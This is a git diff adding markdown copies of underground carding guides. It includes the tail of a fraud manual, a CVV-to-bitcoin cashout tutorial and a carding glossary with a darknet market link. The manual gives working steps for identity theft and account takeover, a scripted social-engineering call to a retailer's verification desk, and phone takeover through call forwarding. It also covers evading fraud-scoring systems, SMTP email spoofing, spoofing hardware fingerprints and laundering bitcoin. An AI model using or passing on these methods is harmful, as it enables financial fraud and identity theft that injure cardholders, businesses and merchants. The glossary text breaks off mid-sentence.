weaknesses in other companies' systems, this is a relatively new kind of +fraud and has not been patched. Many people use that to get free Xbox Series from +Microsoft. Most companies require that this warranty claim is done over the phone but don't +worry, it's simple, and most of them don't seem to care about their job. I had 2 declines when +carding Intel, the third one worked like a charm, and they did not even get cocky about it. +You can keep one for yourself and sell the other one on eBay or Craigslist, it's easy money to +make. The point is that they have to try to screen fraud at the same time than offering a +seamless experience for legitimate customers. We just abuse the system. +PICKING THE BEST CARDS +If you don't have access to fulls, or you have a CCV autoshop and you want to get the best +out of it, there's a trick that can save you money, if you have a bit of time to invest. It works +with any autoshop as long as you can see the name and zip of the cardholder. +First, search by desired BIN. If you like ATOs and you want good cards, BINs 426684 and +438854 work well, but that is up to you. If you can't search by BIN, just pick Credit Cards from +any bank. Once you are in the list, find cardholders corresponding to your gender, and for +each one, do the same thing. +Search their name and zip on Backstab or SSNFinder to check if you can find them. Most of +time time (>50%), you will not, especially if the cardholder is under 45 years old. So just do + +the same for the next result. When you have the SSN and DOB of the cardholder, before +buying the card, do this thing to double­check the info: +Go on peoplefinders.com and get their background report. Check if the DOBs match, and if +the address list matches too, to make sure you have their SSN and DOB 100% accurate. +When you are sure, buy the card, and buy SSN and DOB. You now have a fulls. You can go +on archives.com or ancestry.org to get their MMN. Here's how to search; +Card an account on any of those 2 sites (level 2 card is enough, it's very easy). Get the +mother's name on the background report, and search using her first and last name, and +correct date of birth. Search for “marriage” records, if you can't find any, search “birth” +records. If you don't find anything, try searching for the father's marriage records. Note that +not every state / county has their records made public, so it's possible that you won't find it at +all; it's okay, just make one up when you ATO the card. +This way, you can scrub the autoshops and select only the cards where you can have full +information. This is my trick to get only good cards. Of course, the best option is to find a fulls +vendor, but there are not a lof of them, so escalate your cards the way you desire. +Make sure your cards are well organized. I have included a sample Excel file where you can +see how my cards are organized. All cards can be sorted by name, address, number, +expiration, DOB, SSN, etc. Look at the file for more information. Also, use line colors for +different meanings. Example, white rows mean that the card is mine, and still not used. Call +the bank before adding the card to the list, because you want to trash junk cards right away. +Yellow means that the card is burnt, and blue means that the card is currently being striked, +so I know what to focus on. Green means that I fucked up the cardholder's credit history using +his DOB and SSN. When you look for fulls, look at your Excel file, and with the colors, you +can find your card quickly. +Then, just check the balance, study the background report, and you are ready to hit big shops +and get stuff at your drop! +COMMERCIAL FRAUD +Want another (and probably easier) to get items shipped to your drop and getting tired of +carding Newegg and TigerDirect? All right, I'll show you another method for that. This method +works best for Canada but is really good for USA too. +You can find any major provider that only sells to commercial customers. For computer parts, +for example, you can targer ASI, Synnex, and so on. The goal is to get the business + +registration certificate of a business in the town you wish to have your drop. This certificate is +usually public data and can be found on the registration records depending which state or +province you are in. Once you got the business registration documents from a business that +operates in the same field of activity you wish to get items for, you are ready to hit the +provider. +Apply for an account at one of those providers using that document, put all the business +address info, but put a drop address close to that place, and your burner phone number. Both +providers (ASI and Synnex) usually don't call, but just in case, better stay safe. It usually +takes 24­48 hours to open an account. “Your name” is the name of the real business owner. +On the credit application, do not request net terms, just write “no credit” and let them know +you will pay before getting items shipped. +On the credit card authorization form, put the cardholder's (pizza) name, address, card +number, expiration date, CVC code. Let them know that this person is an “officer” at your +business, such as a remote sales representative. Once the application is approved, you are +good to go and hit big amounts. The reason is that they do not make verification when +sending orders, as they almost never get fraudulent orders. They assume that commercial +customers are always going to be legit, but in fact, we use someone else's business +documents to trick them into thinking you are the business owner. +I was able to pull over $5,000 per order using that technique; the merchant is considered +low­risk so there are very few declines, and verifications are almost nonexistent. With +computer parts, it's extremely easy to do that, you can try other commercial providers. Now +you are playing in the big game, and the possibilities are endless. Make sure to never show +your face at the drop once the card burns, as they will really try to find what happened. +NEWEGG AND TIGERDIRECT +Always wanted to card those 2 big merchants to get electronics? I will tell you how. This is +normal difficulty if you know what you are doing and if you are good at social engineering. You +need, at the very least: +1. Cardholder's account ATO and billing phone number changed to your burner +2. Shipping address on file with the bank +3. Full background report on the cardholder +4. Story about why you ship to that address + +5. Local area of the cardholder: restaurants, shopping malls... +And remember, mail forwarding companies are blacklisted by those merchants. Don't try +shipping to MyUS, Bongo, and so on, as it will automatically cancel the order. Which +American would use a US card to ship to a forwarding company to get it out of the country? +None. Have a normal drop address. +Number 5 might seem strange, but it's true. Some people, including myself, have been asked +“can you name a local restaurant near your house” to make sure you are the cardholder. So +it's not a bad idea to get familiar with the surroundings (major malls and restaurants) in case +that happens. You'll thank yourself later. +So, take your time to browse, look around, read descriptions, and appear like a legitimate +shopper. Once you did that a few days and the account is ready, send the order, and try not +to go over $2,000. The order will be placed on “hold” status, and you will have to talk to the +verification department. I will describe the procedure for TigerDirect, but Newegg is fairly +similar. +TigerDirect's website will ask you for addresses, credit card information, then you will have to +pass VBV/MCSC. After that, they will ask you for your date of birth. Then, 3 verification +questions will pop. They are public record information about the cardholder and can be found +in your background report. Try to have so much information that you feel like the cardholder is +your friend. Answer the 3 questions and be quick. If you fail one, you will be asked an +additional question. If you fail 2 or more, forget your order. Once you send everything, your +order will be “on hold” status. You need to call the verification department. Conversation goes +as follow, usually: +Rep: Thank you for calling TigerDirect verification department, can I have your order number? +You: 123456 +Rep: All right, what is your name? +You: James Layton +Rep: Thank you Mr. Latyon, let me verify the order for you. +(you will be on hold about 2 minutes) +Rep: Thank you for holding, is a tenant at the shipping address? +You: Yes (giving the wrong answer voids the order) + +Rep: I could not locate that person in the system. So you will be offered 2 options. Either we +ship to your billing address, or you need to call your bank to add the shipping address as an +alternate address on file so we can ship there. +You: I already did. +Rep: Oh really? All right then, let me verify that for you. Please wait. +(you will be on hold while they call your bank, sometimes they can make a 3­way call) +Rep: All right, I see the shipping address is on file. Thank you, and is it okay if I call you on +that phone number, 123­456­7890? (whatever phone is the primary billing number) +You: Yes, sure. +Rep: Thank you, hold on. +(the phone will ring, pick the call, or the order will be void) +Rep: All right, we have successfully verified your identity Mr. Latyon. We will have the order +shipped out to you tonight. +See the pitfalls in the dialog above. You must assume that the shipping name is a tenant at +the address. For example, if the cardholder's name is James Latyon, you can ship to a +Joseph Layton and assume it's your son, but make sure that name is on the background +report and you have their DOB. Sometimes they may ask for it if they get suspicious. +It is also a good practice to avoid Hotmail addresses; anyone can make a fake Hotmail under +someone +else's name. ​You should use a custom e­mail with a custom domain.Next, you must make +sure you can pick the phone when they call the “billing” number. If you do all that correctly, +you are good to go and you will get your parts. They do not ask for scans of documents, +everything is done over the phone. +THE PTO +When you commit Account Take­Over fraud, also known as ATO, you take “ownership” of the +victim's account. Even if you change the phone number on file, they still keep record of the +previous phone number. This is where this section will prove useful. I will give you the +transcript of a failed ATO I had 2 months ago, and you will understand. +(pass verification questions) Me: I am calling because I tried to place an order online, but it +got declined. The charge is $1500 and the merchant is Newegg. +Agent: No problem Mr. Johnson, let me see what I can do for you, can you please hold? +(by experience, if they put you on hold, hang up, it's most likely burnt, here it took 5 minutes) +Agent: Hello? +Me: Yes madam, I'm still holding. + +Agent: Unfortunately I will not be able to let the charge go though, and I can no longer provide +service on this account. +Me: How about my card? What should I do? +Agent: You can destroy the card, as you are not the real Robert Johnson. +This is a situation that sucks, and there's a way to avoid that. It has to be done before calling +the bank. What happened here is that the agent called the previous number, even if I changed +it a few days ago. The real cardholder got the call, and you can imagine the rest. +First of all, take the real phone number of the cardholder, and use WhitePages to find who is +the phone provider. If you cannot find it, then you might want to use Spooftel and call the +various providers (AT&T, Verizon, Sprint, etc.) and use their automated system to try to find +out if the number is registered with them. You can use phonevalidator.com to see if the phone +is a cellphone or a landline. When you have the background report of the victim, you can see +that they often have many phone numbers. Use the service to find which one is landline and +which one is cellphone. For cellphones, it's very easy to find the provider, as most of them +allow you to call the phone and press * (star) to go in the voicemail settings, so you recognize +the greeting. Use your logic, and write the phone numbers, probably like that: +Phone 1, landline, 555­123­4567, Verizon Phone 2, cellphone, 666­234­5678, AT&T +Now, remember, you have the full address, DOB, SSN, and more information on the +cardholder, and you know what is his phone company. What are we gonna do? That's right, +Call Forwarding! +Call up the phone company using the opposite phone (if billing number is the landline, call +with the cellphone, and vice versa), spoof the number. When you talk with the customer +service department, it might go as follow. Don't forget that it's less secure than banks, as it's +not about finances. But it can have worse consequences. +Agent: Thank you for calling Verizon, my name is Mohammed, how can I help you? +Me: Hi! I will be away from my house in the next days but I'm waiting for an important call on +my landline. Since I cannot reach the other party, I would like to set call forwarding so I will +receive the call on my cellphone. +Agent: No problem, can I have your name? +Me: Barack Obama. +Agent: Thank you Mr. Obama, what is your full address? +Me: 123 fake Street, Washington DC, 12345. + +Agent: Thank you, and may I have your date of birth? +Me: October 11 st , ​ ​845. +Agent: Thank you. Did you know that you can press *72 on your phone to activate call +forwarding? This is an easy way to do it without calling customer service. +Me: Thanks for the tip, however I'm not home at the moment, so I am unable to do that. +Agent: Okay no problem, I will activate it for you. What is the phone number you would like +the calls forwarded to? +Me: That's my cellphone, 456­123­3245. (your burner phone) +Agent: All right, and you want it to start now? +Me: Yes, please. +Agent: No problem, I activated it for you. When you will be home, you can use *72 again to +deactivate the forwarding. +Me: Thanks. +Agent: Is there anything else I can help you with? +Me: Nope, thanks. +Some phone companies, AT&T by experience, ask for a 4­digit PIN, but it can be easily +bypassed using DOB and last 4 of SSN. The good point is that, if you are extremely unlucky +and fail (which should not happen because it's easier than banks), the card will not burn. This +is the PTO, Phone Take­Over fraud. +Now you are ready to call the bank to ATO. If they decide to call the billing number (happens +very rarely), you will answer the phone, and it will destroy all suspicions they have. The +cardholder will probably be locked out of his account, but that's not your problem. The first +dialog (failed ATO) can be avoided if you do that before. +When your business is finished, do not forget to call Verizon (or his company) to deactivate +call forwarding. The goal is to get free stuff, not make the cardholder lose friends because +they can't reach him, use a bit of compassion. If you think you will need his phone line for a +few days, you can use RingCentral phone system and decide which numbers you want to +take the calls from, and which ones you just want blindly transferred to the cardholder. He will +probably never notice that someone fucked with his phone line, but will notice the charged on +his card! +Some websites do not require the shipping address to be on file with the company; in those +cases, you can do a PTO without doing an ATO, and put the correct billing number on the + +website. Take the call from them and confirm the order, and restore his phone line. Use your +imagination for the rest. +MAXIMUM FRAUD PREVENTION +The most popular software used by merchants for fraud prevention is the Minfraud software, +designed by Maxmind. It is used to keep fraudsters as bay, but their formula is not so secret. I +will give you the formula, and explain the variables. There is a way to keep this score low. +Many stores have their own preset limits, which are not made public because each store is +different. For example, a store can say that over 7 they send the order to manual review, and +over 9 they cancel it. The definition of the variables goes as follow: +1. IsFreeEmail ​Is the e­mail address from a free provider like Hotmail or Yahoo? +2. CountryDoesntMatch ​Are the shipping and billing countries different? +3. IsAnonymousProxy ​Is the user using an anonymous proxy like a VPN or blacklisted +Socks? +4. HighRiskCountry ​Is the order involving Ghana, Nigeria, or Vietnam? List updated +often. +5. BsDistance ​Distance between billing and shipping addresses, in kilometers. +6. MaxEarthArc ​The half­circumference of Earth, currently set at 20,037 kilometers. +7. BinDoesntMatch ​Is the BIN from a different country than the IP address used to order? +8. BinNameDoesntMatch ​If user is asked for bank name, did he answer correctly? +9. CarderEmail ​Was the e­mail used for fraud on other sites using Maxmind? +10. HighRiskUsername ​Was the username used for fraud on other sites using Maxmind? +11. HighRiskPassword ​Is the password the same than the ones used for fraudulent +orders? +12. ShipForward ​Is the shipping address a mail forwarding company? +13. ProxyScore ​Is the IP address a proxy or socks? +The algorithm used for fraud score calculation goes as follow: +2.5 * IsFreeEmail +1. 2.5 * CountryDoesntMatch +2. 5.0 * IsAnonymousProxy +3. 5.0 * HighRiskCountry +4. 10.0 * min(BsDistance, 5000) / MaxEarthArc +5. 2.0 * BinDoesntMatch +6. 1.0 * BinNameDoesntMatch + +7. 5.0 * CarderEmail +8. 5.0 * HighRiskUsername +9. 5.0 * HighRiskPassword +10. 5.0 * ShipForward +11. 2.5 * ProxyScore = Maxmind score for this order +Now that you have this formula, let's see how we can reduce the score to almost 0. Although +many stores use proprietary software, this one is widely used and is the most popular. Since +there is no way of knowing which software the shop uses, just pay attention to all the +variables and try to look legit. Here is a more in­depth explanation of each variable and how to +pay attention to it. +1. IsFreeEmail +This variable is set to 1 if you use a free e­mail like Hotmail and Yahoo, so don't use it. I'll give +you a trick. Remember the Stripe cashout part? Create an e­mail address from the same +domain, like shopper.name@myfakeshop.com and use it. Since it's a paid e­mail, this flag will +not be raised. I always did that for my orders. +2. CountryDoesntMatch +This variable is set to 1 if you ship to a different country than the billing address. This can be +solved by using a card from the same country than the shipping address. This is easier if you +ship to USA. Note that this is not a big deal since you can make an excuse, but let's not raise +flags for nothing. +3. IsAnonymousProxy +This variable is set to 1 if you use a VPN or public anonymous proxy. This is also true for +blacklisted socks. You can use a RDP instead, or if you can't get one, try to find a clean +socks, but it's mostly trial and error. +4. HighRiskCountry +This variable is set to 1 if you have either the billing or shipping address in a country that is +considered high risk. Since this list is always updated, I can't provide the list, but no western +country is in that list, so if you are in UK or in USA, no danger. + +5. BsDistance and 6. MaxEarthArc +This is the distance, in kilometers, between the billing and shipping addresses, up to a +maximum of score 10. You can solve this problem by getting cards in the same state than you +are shipping to. Using a California card to ship to New Hampshire will raise this score. +7. BinDoesntMatch +This variable is set to 1 if the BIN is from a different country than the billing address. This is +the problem with non­AVS cards, and why I don't recommend them. Stick to AVS, and get a +BIN from the same country. Use common sense. +8. BinNameDoesntMatch +This variable is set to 1 if the user answers the question “issuing bank name” incorrectly. So +for this one, do a BIN check, and write the correct name, exactly as it appears in your BIN +info, and you will be fine. +9. CarderEmail +This variable is set to 1 if the e­mail address was previously used for carding. All websites +send regular usage data to Maxmind and they have a list of the carder e­mail addresses. One +mistake carders make is reusing e­mail addresses, thinking that shops don't know that the +previous shop was carded. Maxmind holds a list of carder e­mail addresses submitted by +shops. Use each e­mail address only once, and use a different e­mail next time you card. +10. HighRiskUsername +This variable is set to 1 if the username was previously used for carding. Read the above +statement and do the same thing than e­mail addresses. +11. HighRiskPassword +This variable is set to 1 if the password was previously used for carding. Pay attention to not +re­use passwords across sites. +12. ShipForward + +This variable is set to 1 if the shipping address is a mail forwarding company. They include +MyUS, Bongo, and many others. Some sites will outright ban those addresses and cancel +every order made to them. Avoid shipping there, there are many other options to get drops. +13. ProxyScore +This variable is set to 1 if the originating IP addresses is a proxy, or a socks. If the proxy's +goal is to be anonymous, then the variable IsAnonymousProxy will be set to 1 also. +Having all this information in hand will allows you to nuke fraud prevention systems and get +your stuff even more easily. The high­risk country list is always updated but you can always +google for it if you want to have an up­to­date list. +Always use a VPN with your socks proxy. The TrueIP technology used by many fraud +prevention software can sometimes bypass your proxy and get your real IP, so pay attention. +AVS +AVS is Address Verification System, a fraud prevention system used by shops to make sure +the billing address is correct. +It works by computing the numeric part of the address (street address and zip code) against +what's on file with the bank to make sure it is accurate. It compares only the numeric portion +only; so 123 Right Street is the same than 123 Wrong Way. The zip code is compared in full. +Why is AVS important? Because it causes automatic declines on many site if the AVS does +not fully match. If the cardholder can't write his own address, the website will not believe for a +second that you are the genuine cardholder. Many sellers sell non­avs cards. Is this good? +We'll see. +Let's say you have a non­avs Amex card from Colombia (those are very popular). People tend +to use those on USA online stores and put the billing address and shipping address to be the +same, hoping the card will pass AVS. It will. But... +A clever fraud screening agent will see that the BIN is from Colombia. What is the chance that +someone with a Colombia card has a USA billing address on file, especially knowing the card + +is non avs? That's right, very slim. Expect the order to be cancelled right away unless the +fraud agent is very stupid (they are getting more and more clever those days). +Non­avs card are to be taken with caution. Do not assume you are able to card any shop with +these just because they do not use address verification systems. +SPOOF YOUR E-MAIL +Sometimes you might need to impersonate someone and spoof an e­mail for various reasons. +There's a clean and undetectable way to do that, and that's what I'm going to explain here. +The e­mail will look 100% legit. +To spoof e­mails, you will require to make the e­mail yourself. This means creating the +headers and everything. To make a test, just send a "Hello World" to a test Hotmail address, +click on "View Message Source", and you will see the top headers. Paste everything (the +source) in a Notepad++ document. You will see a header that looks like: +From: Real Name +Modify it to the one you want to show, it's pretty self­explanatory. For example, change it to +that: +From: TCF Hack +Then you have the full e­mail in a Notepad++ document. Next, get a Telnet client. I +recommend Putty, it can be downloaded for free. Next, make sure you use an anonymous +connection (I advise against VPN as it is obvious it's coming from a public proxy; use +something like a hacked wifi, 3G dongle, etc.) and your security is correct. +Find the mail exchange server for your domain. For that, go on +http://www.dnsqueries.com/en/mx lookup.php and enter your domain, example "hotmail.com" +and you will get the mail exchange addresses. If there are many, just pick one random. In +your case it will be "mx3.hotmail.com". +We have everything we need! Open a Putty Telnet connection to your mail exchange server, +port 25. The "conversation" will go as follow (it can vary a bit, depending on the messaging +software): +Send: EHLO mx.spoofedserver.com +Response: Welcome mx.fakeserver.com + +Send: MAIL FROM: spoofedemail@dsfdsagsdg.com +Response: 250 2.1.0 Ok +Send: RCPT TO: destination@fdsgsfdg.com +Response: 250 2.1.5 Ok +Send: DATA +Response: 354 end data with . +(paste all your data here, the one you edited with Notepad, then press Enter, put a dot (.) and press +Enter again) +Response: 250 2.0.0 Ok: queued as 43958340634 +Your fake e­mail is sent. Note that for some providers like Hotmail, if you attempt that (from +Hotmail to Hotmail), they will put it in Junk Mail because the originating IP is not one of +Hotmail's servers and they recognize it as spoofed. However if you send an e­mail to Hotmail +from another server (example @tcf.onion), it will work like a charm. For smaller messaging +servers, everything will go smooth. Now more people will fall for your scams. +COMPLETELY SPOOF YOURSELF +This is about people who are serious into hiding your identity. Newbies would assume that by +changing your VPN location, you are someone new. More advanced users will say that by +changing your VPN, your Socks, and by using a completely new browser with user agent, +changing fonts, resolution and systme time, you are better. In fact, both are wrong. Payment +processors and Paypal have extremely advanced ways to fingerprint people and we will learn +here how to bypass that. +What software or websites (through complex Javascript calls) can use to fingerprint you can +include motherboard serial numbers, system UUID (unique identifier), and so on. That's a lot +of stuff to spoof! To spare you the research of spoofing everything, I have prepared a small +program, DMI Spoof, included in this package. This program was written by myself and is +used to modify a VirtualBox virtual machine to make it appear completely new! +Run DMI Spoof and you will be asked for 2 parameters. 1) VboxManage.exe path. This is the full +path of the VboxManage.exe file, usually located in the same installation directory than +VirtualBox. 2) Name of your VM. When you open VirtualBox, this is the name that appears in +bold black characters in the list. You know what this is. + +Note that you can also supply those parameters at the command line to run it faster, the first +parameter will be the VboxManage.exe path, and the second paramater will be the VM name. +It provides a faster way to spoof everything. +Once you supplied those 2 parameters, DMI Spoof will alter the VM to change the BIOS +brand, motherboard information and serial numbers, CPUID information and a few other +parameters. You will appear as having a completely new computer made of completely +different hardware, with no way of knowing that this has been spoofed. +Once you boot into your VM, change the following settings in Windows, as they can also be +used to fingerprint you, and cannot be altered using DMI Spoof: +1. Screen resolution (you can usually drag a corner of your VM) +2. Install or delete a font in the Fonts folder (font list can be found using JS) +3. Change the computer name (requires reobot) +4. Use Tmac to spoof the network MAC address (can be found using advanced +Javascript) +5. Change user­agent (use the User Agent Switcher extension for Firefox) +6. Change VPN location or Socks proxy (this is obvious) +Once you changed everything, do not re­access your sites from the same IP than before, or +you will have to restart the whole process! +This is enough to protect you from all fingerprinting processes; for payment processors and +high security sites, this is a must. There is no such thing as “too much security”. +Note that all this stuff is equivalent to getting a new computer. You will appear as completely +new and there is no way to trace this back to the original machine. Spoofing DMI is something +easier done on a virtual machine, and if you read this chapter correctly, you know that you +must always place your carding software in a virtual machine for maximum security. +SAFEGUARDING YOUR VPN +When it comes to using a VPN, many people have a sharky connection and their VPN +connection disconnects sometimes. What happens if you are using an auto­cashout script or +you are logged in using your fake username on an online shop? That's right. The connection +will be established and will reveal your real IP. For Windows 7+ users, there is a +Windows­native protection you can use to avoid such a thing. + +When you connect your VPN the first time, Windows will ask you if this connection is Home, +Office or Public network. You must select Public. Then go in the Windows advanced firewall +settings and follow these steps to protect yourself: +1) Go in the “outbound traffic rules” section of the advanced configuration window. +2) Right­click on “outbound traffic rules” and select “add rule”. +3) You will be asked which type of rule you want to create. Select “program”. +4) Click on “browse” and select the .exe file of the application you want, for example +Firefox. +5) Select “block connection”. +6) When asked when will the rule be applied, check “home” and “office”, uncheck “public”. +7) Give a meaningful name to this rule, for example “VPN Firefox”. +8) Create the same rule for every program you want to safeguard. +This way, all connections not on the Public domain (not made through VPN) will be blocked +for the selected programs, while still allowing the system requests to take the standard way. If +your VPN is disconnected, you will not be able to use those programs. You should do this for: +1. Firefox +2. Google Chrome +3. Tor Browser +4. Tor Process +5. SOCKS Proxy +6. Proxifier +7. Pidgin +8. Thunderbird +9. Any other program you might judge useful. +Note that you can't just block every single packet not sent through the VPN. Many programs +including the operating system itself must communicate on the local network without +restrictions, and using the rule “block all programs” instead of selecting a program can make +the system instable and have unpredictable consequences. Also, you need to use traffic on +the “Home” domain to be able to connect to your VPN. +This ensures that your IP will never be revealed in case of a disconnection. In that case, just +reconnect your VPN and everything will continue as normal. You will not have to constantly +watch your connection status. + +In case you do not know the path of the file you should choose, you can open the task +manager using Ctrl + Alt + Delete (or right­click on the taskbar and select “open task +manager”), right­click on the process and select “open file location”. This will give you the full +path of the file, so you can add it to the firewall rules. +For older Windows, you can use Comodo firewall to achieve the same thing, however this is +beyond the scope of this tutorial and has proven to cause system instability. The Windows 7+ +native method has proven to be the most stable and most secure as of now, so enjoy your +protected system! +MOST COMMON MISTAKES +This section talks about the most common mistakes newbies make when they start carding. +Some can be fatal, other one are just not important, but it's important to understand those +points. +#1 – Bragging about your stuff +When you get free stuff, do not brag to your friends, your family, or girls. You never know +when someone will be pissed at you and decide to report you. Keep it for yourself, and be +quiet about it! Just say you have a way to get cheap stuff, and it's private. That's all. +#2 – Linking to your personal life +Do not ask a friend to use his house as a drop. Do not ship to your workplace, your dad's +house, or worse, your own house! If the police shows up at your friend's house, he will rat you +out for sure. Don't trust people that much. +#3 – Starting too big +When you first start carding, do not attack merchants like Newegg or TigerDirect. They are +not easy and they will give you a negative feeling about carding before you even get free stuff. +Start small, for example, clothes. +#4 – Using the same nickname on hacking boards and on clearnet sites +Many newbies forget that, and yes, there are probably LE officers on DW, watching what's +going on. If they can Google your username and see your Facebook or anything else, you're +fucked. Use a name that you use nowhere else! + +#5 – Responding to allegations of fraud +Sometimes, you can get caught off­balance, and for example, a shop will respond by “the +order was fraudulent, so we canceled it”. If you carded them successfully 3 times before, don't +talk about it. If you just want to show them that you owned them, it can persuade LE to track +you, because you just linked the fraudulent orders together. Just don't reply anything. +#6 – Not washing your bitcoins +If you buy (or card) bitcoins with Virwox, they can use the blockchain to trace where those +bitcoins went, and eventualy link to you. Use a service like BTC Fog to wash them and get +brand new bitcoins, not linkable to you, for your underground operations. +#7 – Talking to your partners on a traceable site +Do not use Facebook to talk to your partner about carding. Any LE officers can subpoena +Facebook to get your conversation history and catch you. Use Pidgin/Gajim + OTR/OMEMO +to encrypt your conversation, and use VPN to connect. Make sure you're not traceable. +#8 – Getting caught off­balance during an ATO +When you are ATOing an account, stay calm, do not get thrown off by questions. If you +answer incorrectly (because very often, they have inaccurate information), stay calm and +explain yourself, remember, the card is yours. Do not show fear, because they will catch you. +#9 – Hitting the same drop +This is pretty self­explanatory; finding drops is a pain, but make the extra effort and get a +virgin drop. There is already heat on the first place, so do not put more and risk getting +caught. A drop is good for 3 days; after that, time to move on. You can apply this principle +with girls too. +#10 – Accessing your fake e­shop without VPN +When your Stripe account gets burnt and they subpoena your fake e­shop to give them the +access log, you don't want them to see your real IP and trace back to you. Always use VPN to +upload files, test your shop, and so on. + +I ​hope this guide was useful to you. I tried to put as much as my knowledge as possible to +help fellow carders in the underground world. Use any part you might find useful to you and +try to hit for big. Again, thanks to everyone who bought the guide, and if you have any +question, post in the marketplace so you can be provided better help. +REMEMBER: Be safe! +­Sacky diff --git a/CVV Cashout Via BTC_pdf.md b/CVV Cashout Via BTC_pdf.md new file mode 100644 index 0000000..cfea306 --- /dev/null +++ b/CVV Cashout Via BTC_pdf.md @@ -0,0 +1,31 @@ +# CVV Cashout Via BTC + + +--- + +CVV Cashout Via BTC +I’d tidy this up a bit with a noob-friendly tutorial on how to buy bitcoins with a CVV through VirWox. +What you will need. +Valid CVV (any country will do) +Clean Socks5 proxy as close as possible to cardholder’s address +Good DNS setup +Ok lets get started. +You’ll need an email account. Go create a new one at yahoo/gmail/whatever…..doesn’t matter which (i +wouldn’t use tormail for this……too much of a flag). +Go to https://www.virwox{.}com/, and create a new account using the email you just set up and the name on +the CVV. Just make up a fake SL avatar – you don’t need to validate it. +You will then have to confirm your new account by retrieving the temp password from your email. +First thing to do in Virwox is change your password in the “Change Settings” tab on the left. +Now we’re ready to do some carding. Click “deposit” and scroll down to the Skrill(moneybookers) option. Then +enter the max amount for the currency of your card (currently $56 for USA cards) and click the moneybookers +logo. +If you have NoScript installed you will have to temporarily allow all this page. Enter the details you have for the +CVV and make up a fake date of birth if you dont have a genuine one. +If all goes well, you will then be taken back to the main page with your USD/EUR/GBP balance filled. +On the “exchange” menu left of screen choose USD/SLL to convert to Linden $s, then BTC/SLL to convert to +bitcoin. +Now withdraw. +Easy Profit. +Note: +Typically Virwox hold funds for 48 hours before releasing. +You can process payments a total of 3 times with each card…..one transaction every 24hours diff --git a/Carding Vocabulary and understanding terms_pdf.md b/Carding Vocabulary and understanding terms_pdf.md new file mode 100644 index 0000000..c58ef43 --- /dev/null +++ b/Carding Vocabulary and understanding terms_pdf.md @@ -0,0 +1,117 @@ +# Carding Vocabulary and understanding terms + + +--- + +DISTRIBUTED BY AllAboutCarding +For Credit Cards,Paypal Accounts,Bank Accounts and more tutorials check out my store +Carding Vocabulary/ TERMS +Evolution market: http://k5zq47j6wd3wdvjq.onion/store/34615 +-CC's that start with number 3xxx-xxxx-xxxx-xxxx are AMEX (or AmericanExpress) and their cvv2 is with 4 digits +(some RARE times with 3) +-CC's that start with number 4xxx-xxxx-xxxx-xxxx are VISA and their cvv2 is with 3 digits +-CC's that start with number 5xxx-xxxx-xxxx-xxxx are Mastercard and their cvv2 is with 3 digits +-CC's that start with number 6xxx-xxxx-xxxx-xxxx are Discover(or Novus) and their cvv2 is with 3 digits (some RARE +times with 4) +------------------------------------------------------------------------- +Bank-emitent (Issuing bank) - bank which has issued the card +Billing address - the card owner address +Drop - innerman. His task is to receive the money or goods and, accordingly, to give the part of the earnings to you. +Biling - office, which has agreement with a bank. Also this office assumes payments for the cards. +Card bill - it's a Bank emitent card bill. +Bank-equirer - bank, in which the store opens the account. +Merchant account - bank account for accepting credit cards. +Merchant Bank - bank, through which occur the payments between the buyer and the salesman (frequently it is used as +synonym "bank-equirer"). +Cardholder - owner of the card. +Validity - suitability card using. +White plastic - a piece of the pure plastic, where the information is plot. +CR-80 - rectangular piece of pure white plastic (without the drawing image) with the size of a credit card with the +magnetic strip. +Transaction - charege to the credit card +POS terminal (Point Of Sale terminal) - reading card device, which stands at commercial point. +PIN-code - the sequence, which consists of 4-12 numbers. It is known only to the owner of card. By simple words +password for the work with ATM and so on. +AVS - the card owner address checking. It is used for the confirmation of the card belonging exactly to its holder. +"Globe" - card holographic gluing with the image of two hemispheres (MasterCard). +Pigeon (hen) - card holographic gluing with the image of the flying pigeon (VISA). +Reader - information reading device for the readout from the magnetic strip of card. +Carding Vocabulary and understanding terms.txt[9/3/2014 1:01:52 PM] + +Encoder - read/write device for the magnetic track of the card. +Embosser - card symbol extrusion device. +Card printer - card information printing device. +Exp.date - card validity period. +Area code - the first of 3 or 6 numbers of the card owner phone. +CVV2, cvv, cvn - 3 or 4 additional numbers, which stand at the end of the number of card. +ePlus - program for checking the cards. +BIN - first 6 numbers of the card number due to those it is possible to learn what bank issued out the card and what is +the type of this card (ATM-card, credit, gold, etc.). Synonym of word "Prefix". +Chargeback - the cardholder's bank voids the removal of money from its card. +Dump - information, which is written to the magnetic strip of the card, it consists of 1,2 or 3 tracks. +Track (road) - a part of the dump with the specific information. Every 1-st track is the information about the owner of +the card, 2-nd track - information about the owner of card, about the bank issued the card, etc. 3-rd track - it is possible +to say - spare, it is used by stores for the addition of the points and other. +Slip - synonym to the word "cheque" (conformably to card settlings). +Card balance - money sum that finding on the card account. +MMN Mothers Maiden Name, important if you want to change the billing address +some terms: +Automated Clearing House (ACH) - the automated clearing house. The voluntary association of depositors, which +achieves clearing of checks and electronic units by the direct exchange of means between the members of association. +Continuous Acqusition and Life-cycle Support (CALS) - the integrated system of the production guaranteeing, purchase +and expluatation. This system makes possible to computerize all data about the design, development, production, +servicing and the propagation of the production. +Debit Card - Card, which resembles the credit card by the method of using, but making possible to realize direct buyer +account debiting at the moment of the purchase of goods or service. +Delivery Versus Payment (DVP) - the system of calculations in the operations with the valuable papers, which ensures +the mechanism, which guarantees that the delivery will occur only in the case of payment and at the moment of +payment. +Direcht debit - payment levy method, mainly, with the repetitive nature (lease pay, insurance reward, etc.) with which +the debitor authorizes his financial establishment to debit his current account when obtaining of calculation on payment +from the indicated creditor. +Electronic Fund Transfer (EFT) - the remittance of means, initiated from the terminal, telephone or magnetic carrier +(tape or diskette), by transfer of instructions or authorities to financial establishment, that concern to the debiting or +crediting of the account (see Electronic Fund Transfer/Point of Sale - EFT/POS). +Carding Vocabulary and understanding terms.txt[9/3/2014 1:01:52 PM] + +Electronic Fund Transfer/Point of Sale - EFT/POS - debiting from the electronic terminal, for the means transfer +purpose from the account of a buyer into the payment on the obligations, which arose in the course of transaction at the +point of sale. +Integrated Circuit (IC) Card - It is known also as chip card. Card equipped with one either several computer micros-chip +or integrated microcircuits for identification and storing of data or their special treatment, utilized for the establishment +of the authenticity of personal identification number (PIN), for delivery of permission for the purchase, account balance +checking and storing the personal records. In certain cases, the card memory renewal during each use (renewed account +balance). +Internet - the open world communication infrastructure, which consists of the interrelated computer networks and which +provides access to the remote information and information exchange between the computers. +International Standardisation Organisation (ISO) - International organization, which carries out standardization, with the +staff office in Geneva, Switzerland. +Magnetic Ink Character Recignition (MICR) - System, which ensures the machine reading of the information, +substituted by magnetic inks in the lower part of the check, including the number of check, the code of department, sum +and the number of 